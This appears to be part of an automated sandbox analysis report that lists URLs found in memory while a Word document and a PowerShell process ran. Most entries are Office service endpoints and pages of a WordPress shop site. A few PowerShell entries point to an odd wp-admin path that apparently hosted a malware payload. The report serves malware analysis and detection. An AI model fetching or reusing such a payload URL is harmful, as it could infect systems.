Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/p10-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/p10-plus/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/p10/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/p20-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/p20-pro/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/p20/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/p30-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/p30-pro/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/p30/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/p8-lite-2017/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/pocophone-f1/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/redmi-5/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/redmi-5a/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/redmi-6/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/redmi-7/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/redmi-mi-8-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/redmi-mi-8-pro/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/redmi-mi-8/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/redmi-note-5/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/redmi-s2/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/s10-5g/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/s10-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/s10-plus/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/s10/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/samsung
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/samsung-galaxy-s5-neo/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xa2-ultra/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xa2/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperia-x-compact/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperia-x/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperia-xa-ultra/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperia-xa/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperia-xa1-ultra/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperia-xa1/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperia-xz/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperia-xz2-compact/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperia-xzs/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperia-z5/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xperiaz/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xz1-compact/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xz1/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xz2/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/xz3/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/y5-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/y5-2019/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/y6-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/y6-2019/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/y6-pro-2017/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/y7-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/y7-2019/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/y9-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/y9-2019/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/my-account/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/my-account/lost-password/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/produit/kit-adaptateur-nano-sim-metal/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-admin/maint/d01/
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-admin/maint/d01/xhl
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ajax-search-for-woocommerce/assets/css/style.min.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/essential-grid/public/assets/css/settings.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/essential-grid/public/assets/js/jquery.themepunch.essential.min
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ext_product_bundles/Scripts/accounting.min.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ext_product_bundles/Scripts/addtocart-frontend.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ext_product_bundles/Scripts/back-end.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ext_product_bundles/Scripts/jquery-ui.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ext_product_bundles/Scripts/select2.min.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ext_product_bundles/Styles/backend.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ext_product_bundles/Styles/bootstrap-iso.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ext_product_bundles/Styles/frontend.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ext_product_bundles/Styles/pretty-checkbox.min.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/ext_product_bundles/Styles/select2.min.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/instock-email-alert-for-woocommerce/css/instock-email-alert.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/revslider/public/assets/css/rs6.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/revslider/public/assets/js/revolution.tools.min.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/revslider/public/assets/js/rs6.min.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/rp-payment-fee-discount/assets/js/rppfd.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/woocommerce-multilingual/templates/currency-switchers/legacy-dr
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/plugins/yith-woocommerce-ajax-search/assets/css/yith_wcas_ajax_search.c
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen-child1.3.6/add-to-cart.min.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen-child1.3.6/assets/js/custom.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen-child1.3.6/cache/dynamics.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen-child1.3.6/custom.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen-child1.3.6/style.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen-child1.3.6/woocommerce/style.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/core/assets/js/frontend/html5shiv.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/core/assets/js/frontend/respond.min.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/style.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/assets/bootstrap/css/bootstrap.min.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/assets/css/animate.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/assets/css/comment.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/assets/css/owl.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/assets/css/responsive.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/assets/css/scrollbar.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/assets/css/shortcodes.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/assets/css/widgets.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/assets/fonts/retinaicon-font/style.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/plugins/yit-framework/modules/faq/assets/css/yit-f
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/plugins/yit-framework/modules/logos/assets/css/log
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/plugins/yit-framework/modules/testimonial/assets/c
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/templates/portfolios/big/css/style.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/templates/sliders/banners/css/idangerous.swiper.cs
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/templates/sliders/banners/css/slider.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/templates/sliders/flexslider/css/flexslider.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/theme/templates/sliders/parallax/css/prettyPhoto.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/themes/nielsen/woocommerce/style.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/uploads/2018/09/cropped-Untitled-6-180x180.png
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/uploads/2018/09/cropped-Untitled-6-192x192.png
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/uploads/2018/09/cropped-Untitled-6-270x270.png
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/uploads/2018/09/cropped-Untitled-6-32x32.png
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-content/uploads/2018/10/Accueil.png
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-includes/css/dist/block-library/style.min.css
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-includes/js/jquery/jquery-migrate.min.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-includes/js/jquery/jquery.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/wp-json/
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://cdn.entity.
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.pngc
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell-1-1
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellSkyDriveSignUpUpsellImageht
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellLiveProfileServicehttps
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpseller
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: WINWORD.EXE, 00000000.00000002.2867787945.0000000002DC9000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.2867446566.0000000002CF0000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.2871903982.000000000B58C000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab?
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab?;l
Source: WINWORD.EXE, 00000000.00000002.2867787945.0000000002DC9000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab?C
Source: WINWORD.EXE, 00000000.00000002.2867446566.0000000002CF0000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab?ache
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abcy
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/Bearer
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000003.2198471607.0000000000AF3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/ont
Source: WINWORD.EXE, 00000000.00000003.2198471607.0000000000AF3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/p
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesBearer
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/
Source: WINWORD.EXE, 00000000.00000002.2864486869.00000000004C0000.00000004.00000020.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesn
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosBearer
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosc
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ioshttps://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macBearer
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/machttps://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxsrs
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: WINWORD.EXE, 00000000.00000002.2867983118.0000000002E85000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/Office/16.0.11001.20108?&Clientid=%7b48479AB2-136A-47BD-A72E
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/documentvirality/prod/index.html
Source: WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/documentvirality/prod/index.htmlZSNz
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.html
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.html-2-3
Source: WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.htmlProgressUICommercialExpUrlh
Source: powershell.exe, 00000005.00000002.1958436507.000001BA17DD6000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1958436507.000001BA17DD6000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1958436507.000001BA17DD6000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764631979.000000000C7F6000.00000004.00000001.sdmpString found in binary or memory: https://cr.office.com
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1763302965.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile981-2-6a
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comC
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
